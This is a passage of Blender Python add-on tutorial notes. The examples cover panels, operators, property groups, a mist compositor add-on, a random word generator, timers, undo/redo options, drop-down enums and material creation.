    random_number : IntProperty(name='Random Number', default=0)
    text_list = ['A', 'B', 'C']
    icon_list = ['GHOST_DISABLED', 'MATERIAL', 'PINNED']


class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        mytool = scene.my_tool

        layout.label(text=mytool.text_list[mytool.random_number])
        layout.label(icon=mytool.icon_list[mytool.random_number])
        layout.prop(mytool, "random_number")
        layout.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(Operator):
    bl_label = "Generate Random Number"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
        scene = context.scene
        mytool = scene.my_tool

        x = random.choice(range(0, 3))
        mytool.random_number = x
        print(x)

        return {'FINISHED'}


classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)
    bpy.types.Scene.my_tool = PointerProperty(type=MyProperties)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


if __name__ == "__main__":
    register()

Run it: pressing Generate Random Number produces a random number and changes the panel's label text and icon accordingly.

    Add-on Creation - Insta-Mist

Compared with the earlier version of the code, this one adds a few node-existence checks:

comp_node = tree.nodes.get('Composite')
if comp_node is None:
    comp_node = tree.nodes.new('CompositorNodeComposite')
    comp_node.name = 'Composite'

render_layer_node = tree.nodes.get('Render Layers')
if render_layer_node is None:
    render_layer_node = tree.nodes.new('CompositorNodeRLayers')
    render_layer_node.name = 'Render Layers'

mix1 = tree.nodes.get('Mix')
if mix1 is not None:
    tree.nodes.remove(mix1)

mix2 = tree.nodes.get('Mix.001')
if mix2 is not None:
    tree.nodes.remove(mix2)

cr = tree.nodes.get('ColorRamp')
if cr is not None:
    tree.nodes.remove(cr)

This code is a Blender add-on that adds a mist effect to the scene. It consists of three classes: INSTAMIST_PT_main_panel, INSTAMIST_PT_sub_panel and INSTAMIST_OT_add_mist.

INSTAMIST_PT_main_panel is the main panel class. It holds a single button (labeled "Enable/Disable Mist" in the code) that triggers the execute method of INSTAMIST_OT_add_mist to turn the mist effect on or off.

INSTAMIST_PT_sub_panel is a sub-panel that is shown if and only if the scene's view layer has the mist pass (use_pass_mist) enabled. It exposes the start, depth and falloff properties, which control where the mist begins, how deep it extends, and how it falls off.

Finally, INSTAMIST_OT_add_mist is the operator class. Its execute method enables or disables the mist effect depending on the current state and updates the node tree accordingly: when enabling, it calls mist_comp_action to add the required nodes; when disabling, it removes them again.

bl_info = {
    "name": "INSTAMIST",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (2, 90, 1),
    "location": "View3D > N > INSTA-MIST",
    "description": "Adds Mist to your scene along with arranging the compositor",
    "warning": "",
    "doc_url": "",
    "category": "Add Mist",
}


import bpy
from bpy.types import Panel, Operator


def mist_comp_action(context):
    tree = context.scene.node_tree

    comp_node = tree.nodes.get('Composite')
    if comp_node is None:
        comp_node = tree.nodes.new('CompositorNodeComposite')
        comp_node.name = 'Composite'
    comp_node.location = (700, 0)

    viewer_node = tree.nodes.new('CompositorNodeViewer')
    viewer_node.location = (700, 200)

    render_layer_node = tree.nodes.get('Render Layers')
    if render_layer_node is None:
        render_layer_node = tree.nodes.new('CompositorNodeRLayers')
        render_layer_node.name = 'Render Layers'
    render_layer_node.location = (-200, 0)

    mix_node = tree.nodes.new('CompositorNodeMixRGB')
    mix_node.location = (500, 0)
    mix_node.blend_type = 'ADD'
    mix_node.use_clamp = True

    mix2_node = tree.nodes.new('CompositorNodeMixRGB')
    mix2_node.location = (300, 0)
    mix2_node.blend_type = 'MULTIPLY'
    mix2_node.use_clamp = True

    cr_node = tree.nodes.new('CompositorNodeValToRGB')
    cr_node.location = (0, 0)
    cr_node.color_ramp.elements[0].color = (0.2, 0.2, 0.2, 1)
    cr_node.color_ramp.elements.new(position= 0.27)

    link = tree.links.new

    link(mix_node.outputs[0], viewer_node.inputs[0])
    link(mix_node.outputs[0], comp_node.inputs[0])
    link(mix2_node.outputs[0], mix_node.inputs[1])
    link(cr_node.outputs[0], mix2_node.inputs[1])
    link(render_layer_node.outputs[0], mix_node.inputs[2])
    link(render_layer_node.outputs[3], cr_node.inputs[0])
    return {'FINISHED'}


class INSTAMIST_PT_main_panel(Panel):
    bl_label = "INSTA-MIST"
    bl_idname = "INSTAMIST_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "INSTA-MIST"

    def draw(self, context):
        layout = self.layout
        scene = context.scene

        layout.operator("instamist.add_mist_operator")


class INSTAMIST_PT_sub_panel(Panel):
    bl_label = "INSTA-MIST Options"
    bl_idname = "INSTAMIST_PT_sub_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "INSTA-MIST"
    bl_parent_id = 'INSTAMIST_PT_main_panel'

    @classmethod
    def poll(cls, context):
        return context.scene.view_layers["ViewLayer"].use_pass_mist

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        world = scene.world.mist_settings

        layout.prop(world, "start")
        layout.prop(world, "depth")
        layout.prop(world, "falloff")


class INSTAMIST_OT_add_mist(Operator):
    bl_label = "Enable/Disable Mist"
    bl_idname = "instamist.add_mist_operator"

    def execute(self, context):
        scene = context.scene
        camera = bpy.data.cameras['Camera']
        vl = scene.view_layers["ViewLayer"]
        tree = scene.node_tree

        if vl.use_pass_mist == False:
            vl.use_pass_mist = True
            camera.show_mist = True
            if scene.use_nodes == False:
                scene.use_nodes = True
            mist_comp_action(context)

        elif vl.use_pass_mist == True:
            vl.use_pass_mist = False
            camera.show_mist = False

            mix1 = tree.nodes.get('Mix')
            if mix1 is not None:
                tree.nodes.remove(mix1)

            mix2 = tree.nodes.get('Mix.001')
            if mix2 is not None:
                tree.nodes.remove(mix2)

            cr = tree.nodes.get('ColorRamp')
            if cr is not None:
                tree.nodes.remove(cr)

            comp_node = tree.nodes.get('Composite')
            viewer_node = tree.nodes.get('Viewer')
            render_layer_node = tree.nodes.get('Render Layers')

            tree.links.new(render_layer_node.outputs[0], comp_node.inputs[0])
            tree.links.new(render_layer_node.outputs[0], viewer_node.inputs[0])
        return {'FINISHED'}


classes = [INSTAMIST_PT_main_panel, INSTAMIST_OT_add_mist, INSTAMIST_PT_sub_panel]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)


if __name__ == "__main__":
    register()

Run it! Pressing Enable/Disable Mist creates or removes the nodes in the Compositor, turning the mist effect on or off.

Press F12 to see the rendered result.

    Lists - Create, Append and Remove

Shows how to work with Python lists (a quick demo follows the list):

• list.append(): append a single element
• list.remove(): remove an element
• list.extend(): append several elements at once
• list.clear(): empty the list
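A minimal pure-Python illustration of the four calls, before they get wired into the add-on below:

words = []
words.append('alpha')            # ['alpha']
words.extend(['beta', 'gamma'])  # ['alpha', 'beta', 'gamma']
words.remove('beta')             # ['alpha', 'gamma']
words.clear()                    # []
print(words)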
import bpy
from bpy.types import Panel, Operator, PropertyGroup
from bpy.props import EnumProperty, PointerProperty, StringProperty


class MyProperties(PropertyGroup):

    my_enum : EnumProperty(
        name= "Enumerator / Dropdown",
        description= "sample text",
        items= [('OP1', "Append", ""),
                ('OP2', "Remove", "")
        ]
    )

    new_item : StringProperty()
    my_list = []


class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        mytool = scene.my_tool

        layout.prop(mytool, "my_enum", expand=True)
        layout.prop(mytool, 'new_item')
        layout.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(Operator):
    bl_label = "Submit"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
        scene = context.scene
        mytool = scene.my_tool
        my_list = mytool.my_list  # renamed from 'list' to avoid shadowing the built-in
        enum = mytool.my_enum
        new_item = mytool.new_item

        a = 'alpha'
        b = 'beta'

        if enum == 'OP1':
            # the original condition 'if a and b not in list' only tested
            # membership of b; check both items explicitly
            if a not in my_list and b not in my_list:
                my_list.extend((a, b))
            if new_item != '':
                if new_item not in my_list:
                    my_list.append(new_item)
        else:
            my_list.clear()
        print(my_list)

        return {'FINISHED'}


classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = PointerProperty(type= MyProperties)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


if __name__ == "__main__":
    register()


    How to Display Info Messages

Introduces the statements that write messages to Blender's Info log (a minimal operator using them follows):

• self.report({'INFO'}, "This is a Custom Message")
• self.report({'WARNING'}, "This is a Custom Message")
• self.report({'ERROR'}, "This is a Custom Message")
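A minimal sketch of where these calls live (class name and idname here are placeholders): self.report is a method of Operator, typically called from execute():

import bpy


class DEMO_OT_report_message(bpy.types.Operator):
    bl_label = "Report Demo"
    bl_idname = "demo.report_message"

    def execute(self, context):
        # appears in the Info editor and in the status bar
        self.report({'INFO'}, "This is a Custom Message")
        return {'FINISHED'}


bpy.utils.register_class(DEMO_OT_report_message)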

    Why is it not Working? : Episode 1

Walks through how to debug errors; one common case is sketched below.
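For example (a hypothetical snippet, not from the video): a misspelled variable name produces a NameError that tells you exactly which name Python could not find:

import bpy

cube_size = 2
bpy.ops.mesh.primitive_cube_add(size=cube_size)
print(cube_sise)  # typo -> NameError: name 'cube_sise' is not defined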

    How to make a Random Word Generator

Builds a random word generator:

bl_info = {
    "name": "Random Word Generator",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (2, 90, 1),
    "location": "View3D > N > Random Word Gen Tab",
    "description": "Generates a Random Phrase",
    "warning": "",
    "doc_url": "",
    "category": "Add Words",
}

import bpy
from bpy.types import Panel, Operator, PropertyGroup
from bpy.props import IntProperty, PointerProperty, BoolProperty
from random import randint


class RandomWordGenProperties(PropertyGroup):

    list_a = ["A", "Dr", "Mr", "Mrs", "Our", "The"]

    list_b = ["Adorable", "Adventurous", "Agressive", "Agreeable", "Angry", "Annoyed", "Annoying", "Anxious", "Arrogant", "Attractive", "Average", "Awful", "Bad", "Beautiful", "Better", "Bewildered", "Bloody", "Blushing", "Bored", "Brainy", "Brave", "Breakable", "Bright", "Broken", "Bronze", "Busy", "Calm", "Careful", "Cautious", "Charming", "Cheerful", "Clean", "Clear", "Clever", "Cloudy", "Clumsy", "Colorful", "Comfortable", "Condemned", "Confused", "Cooperative", "Courageous", "Crazy", "Creepy", "Crowded", "Cruel", "Curious", "Cute", "Dangerous", "Dark", "Dead", "Defeated", "Defiant", "Delightful", "Depressed", "Determained", "Different", "Difficult", "Disgusted", "Doubtful", "Dull", "Eager", "Easy", "Elated", "Elegant", "Embarrassed", "Enchanting", "Encouraging", "Energetic", "Enthusiastic", "Envious", "Evil", "Excited", "Expensive", "Exuberant", "Faithful", "Famous", "Fancy", "Fantastic", "Fierce", "Filthy", "Fine", "Foolish", "Fragile", "Frail", "Frantic", "Friendly", "Frightened", "Frozen", "Funny", "Gentle", "Gifted", "Glamorous", "Gleaming", "Glorious", "Good", "Gold", "Golden", "Gorgeous", "Graceful", "Greiving", "Grotesque", "Grumpy", "Handsome", "Happy", "Healthy", "Helpful", "Helpless", "Hilarious", "Horrible", "Hungry", "Hurt", "Important", "Impossible", "Industrial", "Inexpensive", "Innocent", "Inquisitive", "Itchy", "Jelous", "Jolly", "Joyous", "Kind", "Lazy", "Light", "Lively", "Lonely", "Long", "Lovely", "Lucky", "Magnificent", "Misty", "Modern", "Motionless", "Muddy", "Mushy", "Mysterious", "Nasty", "Naughty", "Nervous", "Never-ending", "Nice", "Obedient", "Obnoxious", "Odd", "Old", "Old-fashoined", "Open", "Outrageous", "Outstanding", "Perfect", "Plain", "Pleasant", "Poised", "Poor", "Powerful", "Precious", "Proud", "Putrid", "Puzzled", "Quaint", "Real", "Relieved", "Repulsive", "Rich", "Righteous", "Rival", "Rusty", "Secret", "Scary", "Silver", "Silvery", "Selfish", "Shiny", "Shy", "Silly", "Sleepy", "Smiling", "Sore", "Sparkling", "Splendid", "Spotless", "Stalking", "Steady", "Strange", "Stranger", "Stupid", "Subtle", "Successful", "Super", "Talented", "Tame", "Tender", "Tense", "Terrible", "Thankful", "Thoughful", "Thoughtless", "Tired", "Tough", "Troubled", "Ugliest", "Ugly", "Unsightly", "Unusual", "Upset", "Uptight", "Vast", "Victorious", "Wandering", "Weary", "Wicked", "Wild", "Witty", "Worried", "Wrong", "Zelous"]

    list_c = ["Actor", "Anchor", "Antagonist", "Apple", "Angel", "Angle", "Army", "Astronaut", "Ball", "Balloon", "Beach", "Bear", "Beast", "Book", "Brain", "Cake", "Castle", "Coast", "Colony", "Complex", "Conundrum", "Core", "Crowd", "Dancer", "Detective", "Detector", "Devil", "Director", "Diver", "Driver", "Express", "Factory", "Family", "Forest", "Future", "Gamer", "Garden", "Hacker", "Hangman", "History", "House", "Idea", "Island", "Jail", "Jester", "Joker", "King", "Knight", "Lake", "Lighthouse", "Matrix", "Mind", "Monument", "Moon", "Mountain", "Navy", "Nail", "Night", "Office", "Officer", "Operator", "Page", "Park", "Path", "Pickle", "Pizza", "Place", "Planet", "Player", "Picture", "Price", "Prince", "Princess", "Prison", "Program", "Programmer", "Protagonist", "Queen", "Razor", "Rifle", "Ring", "Reptile", "Road", "River", "Science", "Situation", "Society", "Soldier", "Sound", "Steed", "Story", "Surface", "Tavern", "Tower", "Traveler", "Tree", "Undead", "Unicorn", "Vampire", "Warrior", "Wizard", "World", "Wolf", "Zombie"]

    number_1 : IntProperty(default= 0)
    number_2 : IntProperty(default= 0)
    number_3 : IntProperty(default= 0)

    number_4 : IntProperty(default= 1)

    word_count : IntProperty(default= 3, min= 1, max= 3, description= "Select How Many Words to be Generated")

    wc_bool : BoolProperty(default= False, description= "Selecting this Option will randomize the Word Count")


class RANDOMWORDGEN_PT_main_panel(Panel):
    bl_label = "Random Word Generator"
    bl_idname = "RANDOMWORDGEN_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Random Word Gen"

    def draw(self, context):
        layout = self.layout
        scene = context.scene
        mytool = scene.my_tool

        wc = mytool.word_count
        r_wc = mytool.wc_bool

        if r_wc == False:
            layout.prop(mytool, "word_count", text= "Word Count")
            row = layout.row()

            if wc >= 1:
                row.label(text= mytool.list_a[mytool.number_1])
            if wc >= 2:
                row.label(text= mytool.list_b[mytool.number_2])
            if wc >= 3:
                row.label(text= mytool.list_c[mytool.number_3])
        else:
            row = layout.row()
            if mytool.number_4 >= 1:
                row.label(text= mytool.list_a[mytool.number_1])
            if mytool.number_4 >= 2:
                row.label(text= mytool.list_b[mytool.number_2])
            if mytool.number_4 >= 3:
                row.label(text= mytool.list_c[mytool.number_3])
        layout.prop(mytool, "wc_bool", text= "Randomize Word Count")

        layout.operator("randomwordgen.myop_operator")


class RANDOMWORDGEN_OT_my_op(Operator):
    bl_label = "Generate Random Words"
    bl_idname = "randomwordgen.myop_operator"

    def execute(self, context):
        scene = context.scene
        mytool = scene.my_tool

        a = 0

        b2 = len(mytool.list_a)
        b = b2 - 1

        c2 = len(mytool.list_b)
        c = c2 - 1

        d2 = len(mytool.list_c)
        d = d2 - 1

        e = 1
        f = 3

        r1 = randint(a, b)
        r2 = randint(a, c)
        r3 = randint(a, d)

        r4 = randint(e, f)

        mytool.number_1 = r1
        mytool.number_2 = r2
        mytool.number_3 = r3

        mytool.number_4 = r4

        return {'FINISHED'}


classes = [RandomWordGenProperties, RANDOMWORDGEN_PT_main_panel, RANDOMWORDGEN_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = PointerProperty(type= RandomWordGenProperties)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


if __name__ == "__main__":
    register()

Click Generate Random Words to generate a phrase from the word banks!

    Application Timers

This is a simple Blender Python script that creates 10 cubes at different positions. It uses Blender's timer functionality to call run_10_times() repeatedly at a fixed interval.

First, import bpy pulls in the Blender Python module.

Two global variables, counter and loc, track how many cubes have been created and where the next one goes.

run_10_times() is the function the timer calls. It adds a cube with bpy.ops.mesh.primitive_cube_add(), using the value of loc for the cube's position along the Y axis. It then increments counter by 1 and loc by 2 (so every cube lands in a different spot), and prints the current counter value.

When counter reaches 10, the function returns None, which stops the timer; otherwise it returns 0.5, so it will be called again after 0.5 s.

Finally, bpy.app.timers.register() registers run_10_times(), starting the timer; the script runs when you press Run Script in Blender.

In short, the script uses Blender's application timers to create 10 cubes at different positions, with a delay between each one.

import bpy

counter = 0
loc = 0


def run_10_times():
    global loc
    bpy.ops.mesh.primitive_cube_add(location=(0, loc, 0))
    global counter
    counter += 1
    loc += 2
    print(counter)
    if counter == 10:
        return None
    return 0.5


bpy.app.timers.register(run_10_times)
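A couple of related calls worth knowing (a sketch based on the bpy.app.timers API; the delay value is just an example):

import bpy


def delayed_hello():
    print("hello")
    return None  # returning None stops the timer after one call


# first_interval delays the first call (here: 1 s)
bpy.app.timers.register(delayed_hello, first_interval=1.0)

# a registered function can be checked for and removed again
# (doing it immediately, as here, simply cancels the pending call)
if bpy.app.timers.is_registered(delayed_hello):
    bpy.app.timers.unregister(delayed_hello)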


    Why is it not Working? : Episode 2

This code is an example Blender add-on that defines a panel and an operator. The add-on adds a particle system to the selected object.

First, the necessary modules are imported: bpy plus the Panel and Operator types.

Next, a panel class ADDONNAME_PT_main_panel is defined, inheriting from Panel, with the usual attributes (label, space type, region type, category). Its draw() method builds the panel contents: properties for the particle-system settings and a button that runs the operator. Note that draw() indexes bpy.data.particles["ParticleSettings"] directly, so the panel fails with a KeyError until particle settings with that name exist in the file, which is presumably the failure this episode walks through.

Then an operator ADDONNAME_OT_my_op is defined, inheriting from Operator, with its label and ID name. Its execute() method is the core: when the user presses the button, it calls bpy.ops.object.particle_system_add() to add a particle system to the selected object.

Finally, both classes are added to the classes list and registered with bpy.utils.register_class(); unregister() removes them again when the add-on is no longer needed.

If the script is run directly, register() is called; if it is imported as part of another add-on, register() is not called automatically.

import bpy
from bpy.types import Panel, Operator


class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout

        # raises a KeyError until particle settings named
        # "ParticleSettings" exist in the file
        p_data = bpy.data.particles["ParticleSettings"]

        layout.prop(p_data, "count")
        layout.prop(p_data, "use_rotations")
        if p_data.use_rotations == True:
            layout.prop(p_data, "rotation_factor_random")
        layout.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(Operator):
    """Add a Particle System to your Selected Object"""
    # note: the docstring must be the first statement of the class
    # to serve as the operator tooltip; the original had it after bl_idname
    bl_label = "Add Particle System"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
        scene = context.scene
        obj = context.object
        bpy.ops.object.particle_system_add()
        return {'FINISHED'}


classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)


if __name__ == "__main__":
    register()

    The REDO Operator

This code is another example Blender add-on defining a panel and an operator. It provides a button that adds a cube to the current scene.

First the necessary modules are imported: bpy plus the Panel and Operator types.

A panel class ADDONNAME_PT_main_panel is defined, inheriting from Panel, with the usual attributes; its draw() method adds a single button via layout.operator().

Then the operator ADDONNAME_OT_my_op is defined, inheriting from Operator. Besides its label and ID name, its bl_options attribute specifies the operator's behavior: registration and undo. The loc attribute is a FloatVectorProperty holding the position of the cube to add.

execute() is the core of the operator and runs when the user presses the button: it calls bpy.ops.mesh.primitive_cube_add() to add a cube at the position given by self.loc.

Finally both classes are added to the classes list and registered with bpy.utils.register_class(); unregister() removes them when the add-on is no longer needed. If the script is run directly, register() is called; when imported as part of another add-on it is not.

• bl_options = {'REGISTER', 'UNDO'}

  • bl_options is an operator attribute that specifies the operator's behavior. It is a set of strings; among the options:

    • REGISTER: show the operator as a registered action, i.e. add it to the undo history. Without it, running the operator leaves no entry there.
    • UNDO: the operator can be undone. Without it, the operation cannot be reverted after it runs.

    In this example bl_options is set to {'REGISTER', 'UNDO'}, so the operator is registered and undoable: when the user clicks the button, the action is recorded in the undo history and can be reverted at any time.

• In Blender, Ctrl + Z (or Edit > Undo) undoes the previous action; press it repeatedly to undo several steps.

  Ctrl + Shift + Z (or Edit > Redo) redoes a previously undone action, and can likewise be pressed repeatedly.

import bpy
from bpy.types import Panel, Operator


class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
        layout = self.layout

        layout.operator("addonname.myop_operator")


class ADDONNAME_OT_my_op(Operator):
    bl_label = "Button"
    bl_idname = "addonname.myop_operator"
    bl_options = {'REGISTER', 'UNDO'}

    loc : bpy.props.FloatVectorProperty()

    def execute(self, context):
        bpy.ops.mesh.primitive_cube_add(location=self.loc)
        return {'FINISHED'}


classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


def register():
    for cls in classes:
        bpy.utils.register_class(cls)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)


if __name__ == "__main__":
    register()

Run it! Pressing Button adds a cube, and a dialog box (the operator redo panel) appears for adjusting the cube's position. The action can be undone with Ctrl+Z.

    API Changes and where to Find them?

Notes that Blender has moved to 3.0 and some APIs have changed; the changes are listed under Reference/Release Notes/3.0/Python API - Blender Developer Wiki, though these days you could also just ask ChatGPT.

Blender & Python (11-20)

    Updated Registration Method

emmmm, it just puts the classes registered in register() into a for loop:

def register():
    bpy.utils.register_class(NODE_OT_compGroup)
    bpy.utils.register_class(NODE_PT_customPanel)


def unregister():
    bpy.utils.unregister_class(NODE_OT_compGroup)
    bpy.utils.unregister_class(NODE_PT_customPanel)


if __name__ == "__main__":
    register()

becomes:

classes = [NODE_OT_compGroup, NODE_PT_customPanel, YOUR_CLASS_NAME]

def register():
    for cls in classes:
        bpy.utils.register_class(cls)


def unregister():
    for cls in classes:
        bpy.utils.unregister_class(cls)


if __name__ == "__main__":
    register()

    5 Scripting Tips for Beginners

Introduces a few handy tips.

In the Python Console, enter:

List the 3D objects already in the scene:

list(bpy.data.objects)

List the existing materials:

list(bpy.data.materials)

Create a new material:

bpy.data.materials.new("My Material")

In the Text Editor, Text > Live Edit re-runs the script live as you edit.
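Putting these together in a console session (a sketch; the object list assumes the default startup scene):

>>> list(bpy.data.objects)
[bpy.data.objects['Camera'], bpy.data.objects['Cube'], bpy.data.objects['Light']]

>>> bpy.data.materials.new("My Material")
bpy.data.materials['My Material']

>>> list(bpy.data.materials)
[bpy.data.materials['Material'], bpy.data.materials['My Material']]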

    Enumerator / Drop down Menu

This code defines two classes and two functions that add a panel and an operator to Blender.

1. The ADDONNAME_PT_TemplatePanel class inherits from bpy.types.Panel; it creates a panel and defines its attributes. bl_label is the panel's name, bl_idname its unique identifier, bl_space_type and bl_region_type say which space and region the panel appears in, and bl_category which tab it lives under. The draw() method defines the panel's layout and contents: the layout variable manages the panel's elements, and layout.operator() adds a button that invokes the operator named "wm.template_operator".
2. The ADDONANE_OT_TemplateOperator class inherits from bpy.types.Operator; it creates an operator and defines its attributes. bl_label sets the operator's button label, bl_idname its unique identifier. The preset_enum property is an enum offering three options, each with a unique id, a name and a description. invoke() defines what runs when the user clicks the operator, draw() defines the operator's layout and contents, and execute() contains the code the operator performs.
3. register() uses bpy.utils.register_class() to register the two classes, adding them to Blender.
4. unregister() uses bpy.utils.unregister_class() to unregister the two classes, removing them from Blender.

Finally, if the script is run directly (rather than imported by another script), register() is called to add ADDONNAME_PT_TemplatePanel and ADDONANE_OT_TemplateOperator to Blender.

import bpy


class ADDONNAME_PT_TemplatePanel(bpy.types.Panel):
    bl_label = 'Name of the Panel'
    bl_idname = 'ADDONNAME_PT_TemplatePanel'
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Template Tab'

    def draw(self, context):
        layout = self.layout

        layout.operator('wm.template_operator')


class ADDONANE_OT_TemplateOperator(bpy.types.Operator):
    bl_label = 'Template Operator'
    bl_idname = 'wm.template_operator'

    preset_enum: bpy.props.EnumProperty(
        name='',
        description='Select an option',
        items=[
            ('OP1', 'Cube', 'Add a Cube to the scene'),
            ('OP2', 'Sphere', ''),
            ('OP3', 'Suzanne', 'Add Suzanne to the scene')
        ]
    )

    def invoke(self, context, event):
        wm = context.window_manager
        return wm.invoke_props_dialog(self)

    def draw(self, context):
        layout = self.layout
        layout.prop(self, 'preset_enum')

    def execute(self, context):
        if self.preset_enum == 'OP1':
            bpy.ops.mesh.primitive_cube_add()
        if self.preset_enum == 'OP2':
            bpy.ops.mesh.primitive_uv_sphere_add()
        if self.preset_enum == 'OP3':
            bpy.ops.mesh.primitive_monkey_add()
        return {'FINISHED'}


def register():
    bpy.utils.register_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.register_class(ADDONANE_OT_TemplateOperator)


def unregister():
    # fixed typo: was 'unsregister_class'
    bpy.utils.unregister_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.unregister_class(ADDONANE_OT_TemplateOperator)


if __name__ == '__main__':
    register()

Run the code: the enum produces a drop-down menu:

    Class Naming Convention

Introduces Blender's class-naming convention (a short sketch follows): Darkfall : Blender Python Tutorial: Class Naming Convention (darkfallblender.blogspot.com)
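In brief, class names follow the pattern CATEGORY_TYPE_name, where the type tag matches the base class: _PT_ for panels, _OT_ for operators, _MT_ for menus. A minimal sketch (all names here are placeholders):

import bpy


# _PT_ marks this class as a Panel; CATEGORY in caps, name in snake_case
class MYADDON_PT_naming_demo(bpy.types.Panel):
    bl_label = "Naming Demo"
    bl_idname = "MYADDON_PT_naming_demo"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Demo"

    def draw(self, context):
        self.layout.label(text="an operator would be MYADDON_OT_..., a menu MYADDON_MT_...")


bpy.utils.register_class(MYADDON_PT_naming_demo)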

    How to create and assign a Material Shader

This code implements a simple Blender add-on that adds a panel and an operator to the 3D Viewport. In detail:

1. import bpy imports Blender's Python API.
2. ADDONNAME_PT_main_panel(bpy.types.Panel) defines a panel class inheriting from bpy.types.Panel, named ADDONNAME_PT_main_panel; inside it, the panel attributes and the draw() method are defined.
3. bl_label sets the panel's label text and bl_idname its ID. bl_space_type is the space the panel supports; 'VIEW_3D' means it only appears in the 3D Viewport. bl_region_type is the region it occupies; 'UI' means the sidebar region. bl_category is the tab it belongs to; 'New Tab' puts it on a tab of that name.
4. In draw(), self.layout.operator() adds a button that runs the ADDONNAME_OT_add_basic operator.
5. ADDONNAME_OT_add_basic(bpy.types.Operator) defines an operator class inheriting from bpy.types.Operator; bl_label is the name shown in the UI, bl_idname the operator's ID.
6. The class defines a property named col of type bpy.props.FloatVectorProperty, a 4-tuple holding an RGBA color value.
7. execute() implements the core logic: it creates a new material and assigns it to the selected object. Specifically, it creates a new material named "Basic" (in the variable material_basic) and enables nodes on it. It fetches the material's Principled BSDF node via material_basic.node_tree.nodes.get('Principled BSDF') and sets inputs[7] (described here as the metallic value; input indices vary between Blender versions) to 0.08. It then creates a ShaderNodeRGB node and sets its color to the value stored in self.col. Finally it links the two nodes with material_basic.node_tree.links.new() and assigns the material to the selected object.
8. invoke() opens a small dialog when the user runs the operator so property values can be set there; the return value reports the result.
9. classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic] lists all classes to register.
10. register() registers each class in classes with bpy.utils.register_class().
11. unregister() unregisters each class in classes with bpy.utils.unregister_class().
12. if __name__ == "__main__": register() is the usual idiom: registration runs automatically when the add-on file is executed directly.

The code on the original page, Darkfall : Blender Python Tutorial: How to Create and Assign a Shader Material (darkfallblender.blogspot.com), is outdated: you have to change col = bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) to the annotation form col: bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) for it to run. This is the second time I've fallen into that pit, orz.

import bpy


class ADDONNAME_PT_main_panel(bpy.types.Panel):

    bl_label = "Add Shader Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
        layout = self.layout
        layout.operator("addonname.addbasic_operator")


class ADDONNAME_OT_add_basic(bpy.types.Operator):
    bl_label = "Add Basic Shader"
    bl_idname = "addonname.addbasic_operator"

    col: bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0))

    def execute(self, context):
        material_basic = bpy.data.materials.new(name= "Basic")
        material_basic.use_nodes = True

        principled_node = material_basic.node_tree.nodes.get('Principled BSDF')
        # input indices of the Principled BSDF differ between Blender
        # versions; looking inputs up by name is the safer option
        principled_node.inputs[7].default_value = 0.08

        rgb_node = material_basic.node_tree.nodes.new('ShaderNodeRGB')
        rgb_node.location = (-250, 0)
        rgb_node.outputs[0].default_value = self.col

        link = material_basic.node_tree.links.new
        link(rgb_node.outputs[0], principled_node.inputs[0])

